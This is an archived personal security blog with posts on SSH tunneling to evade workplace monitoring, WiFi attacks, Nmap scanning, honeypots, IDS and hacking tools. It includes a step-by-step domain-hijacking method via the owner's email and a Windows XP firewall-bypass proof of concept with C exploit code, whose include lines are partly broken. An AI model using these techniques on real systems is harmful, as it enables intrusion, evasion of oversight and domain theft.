Hack-Back - By SAM

2011-12-30T22:16:00.000+05:30

Use SSH Tunneling to surf net invisibly

Unable to surf net over work/college ? Want to surf net invisibly ? Well,we have a solution for that,SSH Tunneling.An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too.SSH Is pretty awesome.
Without leaving your seat,you have a way to control a computer which ay be located anywhere on this planet.And if you have access to a PC with an SSHd installed, you can channelize your traffic through that computer,which is particularly is useful in situations when -

The site is normally inaccessible from your current location (School/Work)
You do not want your connection monitored (You’re using a WiFi hotspot/You’re in a country that monitors/censors your internet usage)

In this tutorial,I will be using Firefox on Gentoo Linux , but it its applicable to all distributions of linux.

Step One: Setting Up the Tunnel

All common Linux distributions come with openssh packages. To check whether you have ssh installed already type the command "which ssh". Gentoo has opensh package preinstalled,so no tension :)
First we need to SSH to the server that we want to tunnel through, open up terminal and type the following command

ssh -ND @

Replace

with a port number of your choice; This will be the LOCAL port which Firefox will use to tunnel the traffic later on…Try to choose a high and random port number so as nobody scans or sneaks them in (system admin and firewalls)
Practical Example:

ssh -ND 2945 rishabh.cs07@sviet.ac.in

Now enter your password as usual, and it will hang after authentication, which is perfectly normal as it isn’t an interactive session- Now minimize the terminal and open Firefox.

Step Two: Configuring Firefox

In Firefox, Go to (Depending upon which version you are using)

preferences -> advanced -> Network -> connection settings
or
Tools –> options –> Advanced –> Network –> settings

A new window should appear,select the “Manual Proxy Configuration” option, you’ll need to type some information in the ‘SOCKS Host’ section.

Host: localhost
Port: Port you used in the SSH command earlier.

Save your changes..Just to make sure it worked, check your IP with an online IP checker :)

Happy Surfing....... :)

Google Operating System

2011-12-30T15:39:00.000+05:30

Google Operating System 2010 (Android LiveCD - No Installation)

LiveAndroid lets you download a disk image LiveCD operating systemGoogle Android. Just record the image on the disc, placing it in the CD-ROM drive and restart your computer and you can test Android, without installing it and not touching any files on your computer.

Language: English
File: ISO
Size: 172.46 Mb
Checksums
MD5 E0C5C305F78CD958DBAEA3716C82296F
SHA-1 741B42748666AC085FC12692AC6AFB369B002A2E
CRC32 EEDBFF00

http://hotfile.com/dl/25694949/b9c3559/glvndr.part1.rar.html
http://hotfile.com/dl/25694952/3ae8fe5/glvndr.part2.rar.html

0digg

The Five Deadly Dangers of Unsecured WiFi Networks

2011-11-13T00:07:00.000+05:30

The Five Deadly Dangers of Unsecured WiFi Networks

Once hackers have access to your WiFi network, they can readily capture personal and business information. There are two types of WiFi attacks. Passive attacks, where the hacker captures your network traffic, are almost impossible to detect because the hacker never joins your network. They can sit silently with their antenna tuned into your network and capture gigabytes of network traffic for off-line analysis at a later time. Active attacks, where the hacker joins the network, can be the most devastating because they can launch active attacks into the network and onto your devices on the network.
There are 5 attacks that WiFi hackers can very easily & readily perform on your wireless network with very little effort or expense. The first two are passive attacks, and the last 3 are active attacks. But make no mistake - all of these attacks can be deadly.

Deadly Attack #1: Account and Password Capture. There are several applications that send your account and passwords in clear text over the network. For example, every time a POP3 mail account checks for new e-mail, the account name & password are in the clear as part of the data transfer. Anyone sniffing the network traffic can easily get your e-mail account information. Once they have that information, they can access your e-mail account at their leisure, monitoring for personal information without leaving a trace. From there, any confidential information they can get from your account just escalates their attack.

Deadly Attack #2: E-mail, IM and Web Site Traffic Capture - It is very easy to monitor and capture all of the e-mail traffic sent over an unsecured wireless network. Since most e-mail is sent in clear-text, and instant messaging is sent in HTML, it's very simple to capture the traffic and mine the traffic off line for any â€œinterestingâ€ information at a later time. By monitoring your wireless traffic, all of the HTML data can be captured & reconstituted as web pages on the hackers PC to see exactly what web sites & content you are surfing over the wireless network.

Deadly Attack #3: Accessing Data on Your PC. Let's face it, it's pretty easy to turn file sharing on, and then forget to turn it off when you attach to an open WiFi network. Once file sharing has been left on or the personal firewall is mis-configured, a hacker can readily access you PC and hard drive across the wireless network. Firewalls are also easy to mis-configure or turn off, and forget to turn back on. With older versions of Windows (NT, W2K), if improperly configured, it's easy prey for a hacker to get in over the network, log-in as a null session and take over your platform.

Deadly Attack #4: Access to the Corporate Network. If youâ€™re wireless network is connected to a corporate network through a site-to-site VPN, an open wireless network punches a hole through the network, and opens up both sides of the VPN to anyone attaching to the network. Another threat is with improperly configured client VPNs which can be more easily compromised to provide the hacker access through the VPN.

Deadly Attack #5: SPAM and Virus Launching over the Wireless Network. Unsecured Networks provide are an ideal launch point from which hackers can launch SPAM & Virus attacks because it is very difficult to track the source back to them. From a distance, the SPAMmer can launch the SPAM (from your e-mail account if he or she sniffed your e-mail account info) without repudiation. When the ISP or FBI tracks down the violator, the trail points to your network, and possibly your e-mail account. The liabilities to the owner of the unsecured network are still newly contended battlegrounds for the lawyers.

Detecting DNS and HTTP Load Balancers During Pentest

2010-07-02T00:08:00.000+05:30

Detecting DNS and HTTP Load Balancers During Pentest

During penetration testing finding the no of load balancers on the site is always Complicated and clients expects us to determine the same machine with different IP Addresses.below tool works perfect detecting the load balancers.
Load Balancer Detector (LBD), which uses both DNS and HTTP based techniques to detect load balancers. During the tests, we find that the DNS detection works perfectly, however the HTTP based detection techniques, does give false positives at times (which the tool author acknowledges).

code here
http://ge.mine.nu/code/lbd >>> its a script ,save the code in .sh

Usage details
./lbd.sh www.abc.com

Blocking Nmap Scans using IPtables on Linux server

2010-07-02T00:05:00.000+05:30

Blocking Nmap Scans using IPtables on Linux server

Below Rules will block few of the Nmap Scans on ur linux server
The default config files of IPtables for RHEL / CentOS / Fedora Linux are located here

/etc/sysconfig/iptables -

iptables -A INPUT -p tcp –tcp-flags ALL FIN -j DROP
iptables -A INPUT -p tcp –tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp –tcp-flags ALL ALL -j DROP
iptables -A INPUT -p tcp –tcp-flags ALL FIN,PSH,URG -j DROP

Discovering Rogue Access Points

2010-07-02T00:02:00.000+05:30

Discovering Rogue Access Points During Pentest

During Wireless Security Assessment finding Rogue Access Points are always a big issue,Today we will see how can we find those Rogue Access Points using Nmap to detect based on OS version .
This Nmap command can detect Rogue Access Points in ur network if Rogue Access Points are connected to the network.

# nmap -PN -n -pT:80,443,23,21,22,U:161,1900,5353 -sU -sV -sS -oA osfinger -O -T4 192.168.0.1/24
Starting Nmap
Interesting ports on 192.168.0.1:
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp filtered ssh
23/tcp closed telnet
80/tcp open http Intoto httpd 1.0
443/tcp filtered https
161/udp open|filtered snmp
1900/udp open|filtered upnp
5353/udp open|filtered zeroconf
MAC Address: 11:22:33:44:55:66(Cisco-Linksys)
Device type: WAP|broadband router
Running: Linksys embedded, Netgear embedded, Netgear VxWorks 5.X
OS details: Linksys WRT54G or WRT54G2, or Netgear WGR614 or WPN824v2 wireless broadband router, Netgear WGT624 WAP, Netgear WGR614v7, WGT624v3, or WPN824v2 WAP (VxWorks 5.4.2)
Network Distance: 1 hop
Interesting ports on 192.168.0.100:
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
80/tcp closed http
443/tcp closed https
161/udp closed snmp
1900/udp open|filtered upnp
5353/udp open|filtered zeroconf
MAC Address: 11:33:44:55:66:99 (Intel)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

The above Nmap command scans the network with no ping options set (-PN), and no name resolution (-n). It only scans selected TCP and UDP ports, which I find is a really neat feature to be able to specify independent lists of UDP and TCP ports using the syntax above. I chose the ports listed because they are most frequently found listening on embedded devices.

See the results the first device 192.168.0.1 has interesting ports opened like 21,23,80
MAC Address: 11:22:33:44:55:66(Cisco-Linksys)
Device type: WAP|broadband router
Running: Linksys embedded, Netgear embedded, Netgear VxWorks 5.X
OS details: Linksys WRT54G or WRT54G2, or Netgear WGR614 or WPN824v2 wireless broadband router, Netgear WGT624 WAP, Netgear WGR614v7, WGT624v3, or WPN824v2 WAP (VxWorks 5.4.2)

Using Nmap Through Proxy server

2010-07-01T23:57:00.000+05:30

Network Scanning Using Nmap Through Proxy server

Many times while Penetration testing from the Client Network i have came across a situation in which client has an internal proxy server for accessing everything .
I had to do a network scanning for WAN devices using NMAP through a proxy server and client was using ISA server as their proxy server to achieve there is a tool knows as ProxyChains which allows to run any program through HTTP or SOCKS proxy

http://proxychin a s.sourceforge.net/

how to install and configure proxychains
root@bt:~#apt-get install proxychains (if ur using any debian distro)
root@bt:~#nano etc/proxychains.conf
Than you will see the proxylist where we can add our proxies:
[ProxyList]
# add proxy here …
# meanwile
# defaults set to “tor”
socks4 127.0.0.1 9050
now add ur ISA server proxy server IP like below
[ProxyList]
# add proxy here …
# meanwile
# defaults set to “tor”
192.168.1.13 8080—>ISA server IP
Socks4 127.0.0.1 9050
save and exit
root@bt:~# proxychains nmap -sV WANIP

Honeypots

2010-05-21T15:17:00.002+05:30

-: Honeypots :-

Definition :-
"Honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems." -Wikipedia

"Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource." -Lance Spitzner

Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. Its is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand.

Types of Honeypots :-
Low-Interaction Honeypot:- Low-interaction honeypots have limited interaction, they normally work by emulating services and operating systems. Attacker activity is limited to the level of emulation by the honeypot. These honeypots tend to be easier to deploy and maintain, with minimal risk. Examples of low-interaction honeypots include Specter, Honeyd, and KFSensor.

High-Interaction Honeypot:- High-interaction honeypots are different, they are usually complex solutions as they involve real operating systems and applications. Nothing is emulated, we give attackers the real thing. The advantages with such a solution are two fold. First, you can capture extensive amounts of information. By giving attackers real systems to interact with, you can learn the full extent of their behavior. The second advantage is high-interaction honeypots make no assumptions on how an attacker will behave. Instead, they provide an open environment that captures all activity. However, this also increases the risk of the honeypot as attackers can use these real operating system to attack non-honeypot systems. As result, additional technologies have to be implement that prevent the attacker from harming other non-honeypot systems. However, they can be more complex to deploy and maintain. Examples of high-interaction honeypots include Symantec Decoy Server and Honeynets.

Typical Honeypot Model

Honeypot Softwares :-

Argos by Georgios Portokalidis, Herbert Bos
Back Officer Friendly by NFR Security
Bait N Switch Honeypot by Team Violating
BigEye by Team Violating
FakeAP by Black Alchemy Enterprises
GHH - The "Google Hack" Honeypot by Ryan McGeehan et al
HOACD by Honeynet.BR Project
HoneyBOT by Atomic Software Solutions
Honeyd by Niels Provos
Honeyd Development site by Niels Provos
Honeyd for Windows by Michael A. Davis (port)
Honeynet Security Console for Windows 2000/XP by Activeworx, Inc.
HoneyPerl by Brazilian Honeypot Project (HoneypotBR)
HoneyPoint by MicroSolved, Inc.
Honeywall CD-ROM by The Honeynet Project
HoneyWeb by Kevin Tim
Impost by sickbeatz
Jackpot Mailswerver by Jack Cleaver
KFSensor by Keyfocus
Kojoney by Jose Antonio Coret
LaBrea Tarpit by Tom Liston
NetBait by NetBait Inc.
NetFacade by Verizon
OpenBSD's spamd by OpenBSD Team
ProxyPot by Alan Curry
Sandtrap by Sandstorm Enterprises, Inc.
Single-Honeypot by Luis Wong and Louis Freeze
Smoke Detector by Palisade Systems Inc.
SMTPot.py by Karl A. Krueger
Spamhole by Dr. Uid
Spampot.py by Neale Pikett
Specter by Netsec
SWiSH by Canned Ham
Symantec Decoy Server (formerly ManTrap) by Symantec
Tiny Honeypot (thp) by George Bakos
The Deception Toolkit by Fred Cohen & Associates
User-Mode Linux (UML) by Jeff Dike

Denial Of Service Attack

2010-01-18T12:07:00.002+05:30

Denial Of Service Attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

What is a Denial Of Service Attack?

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.

Types of denial of service attacks

There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

bandwidth attacks,
protocol attacks, and
logic attacks

What is Distributed Denial of Service Attack?

An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.
This makes it difficult to detect because attacks originate from several IP addresses.
If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Domain Hijacking

2010-01-18T12:01:00.001+05:30

Domain Hijacking – How to Hijack a Domain

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain.

These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll seeWhois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrarunder the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

Secure Sockets Layer (SSL)

2010-01-18T11:42:00.002+05:30

Know More About Secure Sockets Layer (SSL)

Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.

What exactly is Secure Communication ?

Suppose there exists two communication parties A (client) and B (server).

Working of HTTP

When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between Aand B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure

Now lets see the working of HTTPS

When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B’s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below

How is HTTPS implemented ?

HTTPS is implemented using Secure Sockets Layer (SSL).A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses

An SSL Certificate enables encryption of sensitive information during online transactions.
Each SSL Certificate contains unique, authenticated information about the certificate owner.
A Certificate Authority verifies the identity of the certificate owner when it is issued.

How Encryption Works ?

Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).

How to identify a Secure Connection ?

In Internet Explorer, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar.You can click the lock to view the identity of the website.

In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.

So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations.Otherwise there are chances of Phishing using a Fake login Page.

I Hope this helps.Please pass your comments.

Bypassing Windows-XP Firewall

2009-12-01T01:25:00.000+05:30

-: Bypassing Windows-XP Firewall :-

There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-

               #include 

#include 

#include 

#include 

#include "Shlwapi.h"             int main( int argc, char *argv [] )

{

char buffer[1024];

char filename[1024];

HKEY hKey;

int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);

strcat(buffer, ":*:Enabled:");

strcat(buffer, "bugg");

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,

"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile"                "\\AuthorizedApplications\\List",

0,

KEY_ALL_ACCESS,

&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;

struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall                trick \n");

fprintf(stdout, " This is not trojan \n");

fprintf(stdout, " Opened port is :2001 \n");

fprintf(stdout, "author:Mark Kica student of Technical University                Kosice\n");

fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)

return 0;

for (; ; )

{

RegDeleteValue(hKey, filename);

fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr,                &fd_size)) == -1)

{

perror("accept");

continue;

}

temp = send(new_fd, "Hello World\r\n", strlen("Hello                World\r\n"), 0);

fprintf(stdout, "Sended: Hello World\r\n");

temp = recv(new_fd, buffer, 1024, 0);

buffer[temp] = '\0';

fprintf(stdout, "Recieved: %s\r\n", buffer);

ezclose_socket(new_fd);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))

break;

}

ezsocket_exit();

return 0;

}

/* EoF */

Honeypots

2009-12-01T01:08:00.003+05:30

-: Honeypots :-

Typical Honeypot Model

Honeypot Softwares :-

Argos by Georgios Portokalidis, Herbert Bos
Back Officer Friendly by NFR Security
Bait N Switch Honeypot by Team Violating
BigEye by Team Violating
FakeAP by Black Alchemy Enterprises
GHH - The "Google Hack" Honeypot by Ryan McGeehan et al
HOACD by Honeynet.BR Project
HoneyBOT by Atomic Software Solutions
Honeyd by Niels Provos
Honeyd Development site by Niels Provos
Honeyd for Windows by Michael A. Davis (port)
Honeynet Security Console for Windows 2000/XP by Activeworx, Inc.
HoneyPerl by Brazilian Honeypot Project (HoneypotBR)
HoneyPoint by MicroSolved, Inc.
Honeywall CD-ROM by The Honeynet Project
HoneyWeb by Kevin Tim
Impost by sickbeatz
Jackpot Mailswerver by Jack Cleaver
KFSensor by Keyfocus
Kojoney by Jose Antonio Coret
LaBrea Tarpit by Tom Liston
NetBait by NetBait Inc.
NetFacade by Verizon
OpenBSD's spamd by OpenBSD Team
ProxyPot by Alan Curry
Sandtrap by Sandstorm Enterprises, Inc.
Single-Honeypot by Luis Wong and Louis Freeze
Smoke Detector by Palisade Systems Inc.
SMTPot.py by Karl A. Krueger
Spamhole by Dr. Uid
Spampot.py by Neale Pikett
Specter by Netsec
SWiSH by Canned Ham
Symantec Decoy Server (formerly ManTrap) by Symantec
Tiny Honeypot (thp) by George Bakos
The Deception Toolkit by Fred Cohen & Associates
User-Mode Linux (UML) by Jeff Dike

Intrusion Detection System (IDS)

2009-12-01T01:06:00.000+05:30

-: Intrusion Detection System (IDS) :-

An intrusion detection system (IDS) is software and/or hardware based system that monitors network traffic and monitors for suspicious activity and alerts the system or network administrator. In some cases the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network.

Typical locations for an intrusion detection system is as shown in the following figure -

Following are the types of intrusion detection systems :-

1) Host-Based Intrusion Detection System (HIDS) :- Host-based intrusion detection systems or HIDS are installed as agents on a host. These intrusion detection systems can look into system and application log files to detect any intruder activity.

2) Network-Based Intrusion Detection System (NIDS) :- These IDSs detect attacks by capturing and analyzing network packets. Listening on a network segment or switch, one network-based IDS can monitor the network traffic affecting multiple hosts that are connected to the network segment, thereby protecting those hosts. Network-based IDSs often consist of a set of single-purpose sensors or hosts placed at various points in a network. These units monitor network traffic, performing local analysis of that traffic and reporting attacks to a central management console.

Some important topics comes under intrusion detection are as follows :-

1) Signatures - Signature is the pattern that you look for inside a data packet. A signature is used to detect one or multiple types of attacks. For example, the presence of “scripts/iisadmin” in a packet going to your web server may indicate an intruder activity. Signatures may be present in different parts of a data packet depending upon the nature of the attack.

2) Alerts - Alerts are any sort of user notification of an intruder activity. When an IDS detects an intruder, it has to inform security administrator about this using alerts. Alerts may be in the form of pop-up windows, logging to a console, sending e-mail and so on. Alerts are also stored in log files or databases where they can be viewed later on by security experts.

3) Logs - The log messages are usually saved in file.Log messages can be saved either in text or binary format.

4) False Alarms - False alarms are alerts generated due to an indication that is not an intruder activity. For example, misconfigured internal hosts may sometimes broadcast messages that trigger a rule resulting in generation of a false alert. Some routers, like Linksys home routers, generate lots of UPnP related alerts. To avoid false alarms, you have to modify and tune different default rules. In some cases you may need to disable some of the rules to avoid false alarms.

5) Sensor - The machine on which an intrusion detection system is running is also called the sensor in the literature because it is used to “sense” the network.

Snort :- Snort is a very flexible network intrusion detection system that has a large set of pre-configured rules. Snort also allows you to write your own rule set. There are several mailing lists on the internet where people share new snort rules that can counter the latest attacks.

Snort is a modern security application that can perform the following three functions :

* It can serve as a packet sniffer.
* It can work as a packet logger.
* It can work as a Network-Based Intrusion Detection System (NIDS).

Further details and downloads can be obtained from it's home- http://www.snort.org

Hacking Tools

2009-12-01T01:02:00.000+05:30

-: Hacking Tools :-

Port Scanners :-

Nmap :- This tool developed by Fyodor is one of the best unix and windows based port scanners. This advanced port scanner has a number of useful arguments that gives user a lot of control over the process.

Latest Release:- Nmap 5.00
Download:- http://nmap.org/download.html

Superscan :- A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

Home:- http://www.foundstone.com
Latest Release:- SuperScan v4.0
Download:- http://www.foundstone.com/us/resources/proddesc/superscan4.htm

Angry IP Scanner :- A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.

Home:- http://www.angryziber.com [sourceforge.net]
Latest Release:- IPScan 3.0-beta3
Download:- http://www.angryziber.com/w/Download

Unicornscan :- Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses.

Home:- http://www.unicornscan.org
Latest Release:- Unicornscan 0.4.7-2
Download:- http://www.unicornscan.org

OS Fingerprinting Tools :-

Nmap :- This tool developed by Fyodor is one of the best unix and windows based active os fingerprinting tool.

HomLatest Release:- Nmap 5.00
Download:- http://nmap.org/download.html

P0f :- A passive OS fingerprinting tool. P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall.P0f can detect firewall presence, NAT use, existence of load balancers, and more!

Home:- http://lcamtuf.coredump.cx/p0f.shtml
Latest Release:- p0f v2 (2.0.8)
Download:- http://lcamtuf.coredump.cx/p0f.shtml

Xprobe2 :- Active OS fingerprinting tool. XProbe is a tool for determining the operating system of a remote host. They do this using some of the same techniques as Nmap as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach.

Home:- http://www.sys-security.com [sourceforge.net]
Latest Release:- Xprobe2 0.3
Download:- http://sourceforge.net/projects/xprobe

Vulnerability Scanners :-

Nessus :- Premier UNIX vulnerability assessment tool
Nessus is the best free network vulnerability scanner available, and the best to run on UNIX at any price. It is constantly updated, with more than 11,000 plugins for the free (but registration and EULA-acceptance required) feed. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

Home:- http://www.nessus.org
Latest Release:- Nessus 4
Download:- http://www.nessus.org/download/

GFI LANguard :- A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. I also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches.

Home:- http://www.gfi.com
Latest Release:- GFI LANguard Network Security Scanner 8
Download:- http://www.gfi.com/lannetscan/

Retina :- Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.

Home:- http://www.eeye.com
Latest Release:- Retina Network Security Scanner v5.15.7
Download:- http://www.eeye.com/html/Products/Retina/index.html

Core Impact :- An automated, comprehensive penetration testing product. it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes.

Home:- http://www.coresecurity.com
Latest Release:- Core Impact 4.0
Download:- http://www.coresecurity.com/

ISS Internet Scanner :- Application-level vulnerability assessment
Internet Scanner started off in '92 as a tiny open source scanner by Christopher Klaus. Now he has grown ISS into a billion-dollar company with a myriad of security products.

http://www.iss.net/products_services/enterprise_protection
/vulnerability_assessment/scanner_internet.php

SARA :- Security Auditor’s Research Assistant
SARA is a third generation network security analysis tool that Operates under Unix, Linux, MAC OS/X or Windows. The first generation assistant, the Security Administrator's Tool for Analyzing Networks (SATAN) was developed in early 1995. It became the benchmark for network security analysis for several years. However, few updates were provided and the tool slowly became obsolete in the growing threat environment.

Home:- http://www-arc.com
Download:- http://www-arc.com/sara

Packet Sniffers :-

Ethereal :- This (also known as Wireshark) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Home:- http://www.wireshark.org
Latest Release:- Wireshark 1.0.4 (Ethereal)
Download:- http://www.wireshark.org/download.html

